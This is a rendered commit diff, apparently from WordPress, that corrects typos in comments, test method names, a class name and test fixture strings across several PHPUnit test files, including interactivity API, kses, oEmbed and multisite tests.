<a id="trunktestsphpunittestsinteractivityapiwpInteractivityAPIDirectivesProcessorphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIDirectivesProcessor.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIDirectivesProcessor.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIDirectivesProcessor.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -421,7 +421,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertTrue( $p->has_and_visits_its_closer_tag() );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Test an upercase tag.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Test an uppercase tag.
</ins><span class="cx" style="display: block; padding: 0 10px"> $content = '<IMG src="example.jpg">';
</span><span class="cx" style="display: block; padding: 0 10px"> $p = new WP_Interactivity_API_Directives_Processor( $content );
</span><span class="cx" style="display: block; padding: 0 10px"> $p->next_tag();
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -781,7 +781,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Tests that skip_to_tag_closer skips to the next tag,
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * independant of the content.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * independent of the content.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 60517
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunktestsphpunittestsinteractivityapiwpInteractivityAPIFunctionsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIFunctions.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIFunctions.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIFunctions.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -71,7 +71,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers wp_interactivity_process_directives_of_interactive_blocks
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_processs_directives_of_single_interactive_block() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_process_directives_of_single_interactive_block() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_content = '<!-- wp:test/interactive-block { "block": 1 } /-->';
</span><span class="cx" style="display: block; padding: 0 10px"> $rendered_blocks = do_blocks( $post_content );
</span><span class="cx" style="display: block; padding: 0 10px"> $p = new WP_HTML_Tag_Processor( $rendered_blocks );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -87,7 +87,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers wp_interactivity_process_directives_of_interactive_blocks
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_processs_directives_of_multiple_interactive_blocks_in_paralell() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_process_directives_of_multiple_interactive_blocks_in_parallel() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_content = '
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/interactive-block { "block": 1 } /-->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/interactive-block-2 { "block": 2 } /-->
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -113,7 +113,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers wp_interactivity_process_directives_of_interactive_blocks
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_processs_directives_of_interactive_block_inside_non_interactive_block() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_process_directives_of_interactive_block_inside_non_interactive_block() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_content = '
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/non-interactive-block { "block": 1 } -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/interactive-block { "block": 2 } /-->
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -133,7 +133,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers wp_interactivity_process_directives_of_interactive_blocks
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_processs_directives_of_multple_interactive_blocks_inside_non_interactive_block() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_process_directives_of_multiple_interactive_blocks_inside_non_interactive_block() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_content = '
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/non-interactive-block { "block": 1 } -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/interactive-block { "block": 2 } /-->
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -156,7 +156,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers wp_interactivity_process_directives_of_interactive_blocks
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_processs_directives_of_interactive_block_inside_multple_non_interactive_block() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_process_directives_of_interactive_block_inside_multiple_non_interactive_block() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_content = '
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/non-interactive-block { "block": 1 } -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/interactive-block { "block": 2 } /-->
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -181,7 +181,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers wp_interactivity_process_directives_of_interactive_blocks
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_processs_directives_of_interactive_block_containing_non_interactive_block_without_directives() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_process_directives_of_interactive_block_containing_non_interactive_block_without_directives() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_content = '
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/interactive-block { "block": 1 } -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/non-interactive-block { "block": 2 } /-->
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -203,7 +203,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers wp_interactivity_process_directives_of_interactive_blocks
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_processs_directives_of_interactive_block_containing_non_interactive_block_with_directives() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_process_directives_of_interactive_block_containing_non_interactive_block_with_directives() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_content = '
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/interactive-block { "block": 1 } -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/non-interactive-block { "block": 2, "hasDirective": true } /-->
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -226,7 +226,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers wp_interactivity_process_directives_of_interactive_blocks
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_processs_directives_of_interactive_block_containing_nested_interactive_and_non_interactive_blocks() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_process_directives_of_interactive_block_containing_nested_interactive_and_non_interactive_blocks() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_content = '
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/interactive-block { "block": 1 } -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:test/interactive-block-2 { "block": 2 } -->
</span></span></pre></div>
<a id="trunktestsphpunittestsksesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/kses.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/kses.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/kses.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1362,7 +1362,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 33121
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_wp_kses_attr_data_attribute_is_allowed() {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $test = '<div data-foo="foo" data-bar="bar" datainvalid="gone" data--invaild="gone" data-also-invaild-="gone" data-two-hyphens="remains">Pens and pencils</div>';
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $test = '<div data-foo="foo" data-bar="bar" datainvalid="gone" data--invalid="gone" data-also-invalid-="gone" data-two-hyphens="remains">Pens and pencils</div>';
</ins><span class="cx" style="display: block; padding: 0 10px"> $expected = '<div data-foo="foo" data-bar="bar" data-two-hyphens="remains">Pens and pencils</div>';
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( $expected, wp_kses_post( $test ) );
</span></span></pre></div>
<a id="trunktestsphpunittestslinkthemeFilephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/link/themeFile.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/link/themeFile.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/link/themeFile.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -116,7 +116,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @dataProvider data_theme_files
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_theme_file_existance( $file, $expected_theme, $existence ) {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_theme_file_existence( $file, $expected_theme, $existence ) {
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> if ( in_array( 'theme-file-child', $existence, true ) ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertFileExists( WP_CONTENT_DIR . "/themes/theme-file-child/{$file}" );
</span></span></pre></div>
<a id="trunktestsphpunittestsmediaphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/media.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/media.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/media.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -434,7 +434,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 38965
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_wp_prepare_attachment_for_js_without_image_sizes() {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Create the attachement post.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Create the attachment post.
</ins><span class="cx" style="display: block; padding: 0 10px"> $id = wp_insert_attachment(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_title' => 'Attachment Title',
</span></span></pre></div>
<a id="trunktestsphpunittestsmenuwpAjaxMenuQuickSearchphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/menu/wpAjaxMenuQuickSearch.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/menu/wpAjaxMenuQuickSearch.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/menu/wpAjaxMenuQuickSearch.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -3,7 +3,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @group menu
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-class Tests_Menu_WpAjaxMenuQuickSeach extends WP_UnitTestCase {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+class Tests_Menu_WpAjaxMenuQuickSearch extends WP_UnitTestCase {
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Test search returns results for pages.
</span></span></pre></div>
<a id="trunktestsphpunittestsmetadeleteMetadataphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/meta/deleteMetadata.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/meta/deleteMetadata.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/meta/deleteMetadata.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -53,7 +53,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 32224
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * This is a backwards compatiblity quirk.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * This is a backwards compatibility quirk.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_meta_value_should_be_ignored_when_empty_string() {
</span><span class="cx" style="display: block; padding: 0 10px"> $vals = array( '0', '1', '2', '' );
</span></span></pre></div>
<a id="trunktestsphpunittestsmultisiteavoidBlogPagePermalinkCollisionphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/multisite/avoidBlogPagePermalinkCollision.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/multisite/avoidBlogPagePermalinkCollision.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/multisite/avoidBlogPagePermalinkCollision.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -12,7 +12,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> protected static $site_id;
</span><span class="cx" style="display: block; padding: 0 10px"> protected static $root_page;
</span><span class="cx" style="display: block; padding: 0 10px"> protected static $child_page;
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- protected static $post_and_blog_path = 'permalink-collison';
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ protected static $post_and_blog_path = 'permalink-collision';
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Create a blog and the pages we need to test the collision.
</span></span></pre></div>
<a id="trunktestsphpunittestsmultisitesitephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/multisite/site.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/multisite/site.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/multisite/site.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -844,7 +844,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @param string $value The sanitized option value.
</span><span class="cx" style="display: block; padding: 0 10px"> * @param string $option The option name.
</span><span class="cx" style="display: block; padding: 0 10px"> * @param string $original_value The original value passed to the function.
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @return string The orginal value.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @return string The original value.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function filter_allow_unavailable_languages( $value, $option, $original_value ) {
</span><span class="cx" style="display: block; padding: 0 10px"> return $original_value;
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2149,7 +2149,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Tests whether all expected meta are provided in deprecated `wpmu_new_blog` action.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @dataProvider data_wpmu_new_blog_action_backward_commpatible
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @dataProvider data_wpmu_new_blog_action_backward_compatible
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 46351
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2214,7 +2214,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->wp_initialize_site_meta = $meta;
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function data_wpmu_new_blog_action_backward_commpatible() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function data_wpmu_new_blog_action_backward_compatible() {
</ins><span class="cx" style="display: block; padding: 0 10px"> return array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'default values' => array(
</span><span class="cx" style="display: block; padding: 0 10px"> array(),
</span></span></pre></div>
<a id="trunktestsphpunittestsmultisiteupdateBlogStatusphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/multisite/updateBlogStatus.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/multisite/updateBlogStatus.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/multisite/updateBlogStatus.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -9,7 +9,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> class Tests_Multisite_UpdateBlogStatus extends WP_UnitTestCase {
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Updating a field returns the sme value that was passed.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Updating a field returns the same value that was passed.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_update_blog_status() {
</span><span class="cx" style="display: block; padding: 0 10px"> $result = update_blog_status( 1, 'spam', 0 );
</span></span></pre></div>
<a id="trunktestsphpunittestsoembedfilterResultphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/oembed/filterResult.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/oembed/filterResult.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/oembed/filterResult.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -108,8 +108,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> '<blockquote class="wp-embedded-content"><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title="Hola" width="100"></iframe></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title="Hola"></iframe>',
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- "<blockquote><iframe title=' width=\"'></iframe></blockquote><iframe title='' height=' title=' width=\"'' heigt='123'\"></iframe>",
- '<blockquote class="wp-embedded-content"><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title=" width=""></iframe></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title=" width="" height=\' title=\' width="\'\' heigt=\'123\'"></iframe>',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ "<blockquote><iframe title=' width=\"'></iframe></blockquote><iframe title='' height=' title=' width=\"'' height='123'\"></iframe>",
+ '<blockquote class="wp-embedded-content"><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title=" width=""></iframe></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" title=" width="" height=\' title=\' width="\'\' height=\'123\'"></iframe>',
</ins><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
<a id="trunktestsphpunittestspostgetPageUriphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/getPageUri.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/getPageUri.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/getPageUri.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -11,7 +11,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_get_page_uri_with_stdclass_post_object() {
</span><span class="cx" style="display: block; padding: 0 10px"> $post_id = self::factory()->post->create( array( 'post_name' => 'get-page-uri-post-name' ) );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Mimick an old stdClass post object, missing the ancestors field.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Mimic an old stdClass post object, missing the ancestors field.
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_array = (object) get_post( $post_id, ARRAY_A );
</span><span class="cx" style="display: block; padding: 0 10px"> unset( $post_array->ancestors );
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunktestsphpunittestspostgetPostTypeLabelsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/getPostTypeLabels.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/getPostTypeLabels.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/getPostTypeLabels.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -16,7 +16,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_returns_hierachical_labels() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_returns_hierarchical_labels() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $labels = get_post_type_labels(
</span><span class="cx" style="display: block; padding: 0 10px"> (object) array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'name' => 'foo',
</span></span></pre></div>
<a id="trunktestsphpunittestspostisPostStatusViewablephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/isPostStatusViewable.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/isPostStatusViewable.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/isPostStatusViewable.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -48,7 +48,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function data_custom_post_statuses() {
</span><span class="cx" style="display: block; padding: 0 10px"> return array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // 0. False for non-publically queryable types.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // 0. False for non-publicly queryable types.
</ins><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'publicly_queryable' => false,
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -57,7 +57,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> false,
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // 1. True for publically queryable types.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // 1. True for publicly queryable types.
</ins><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'publicly_queryable' => true,
</span></span></pre></div>
<a id="trunktestsphpunittestspostmetaRevisionsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/metaRevisions.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/metaRevisions.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/metaRevisions.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -187,7 +187,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * Check the meta values to verify they are NOT revisioned - they are not revisioned by default.
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px">
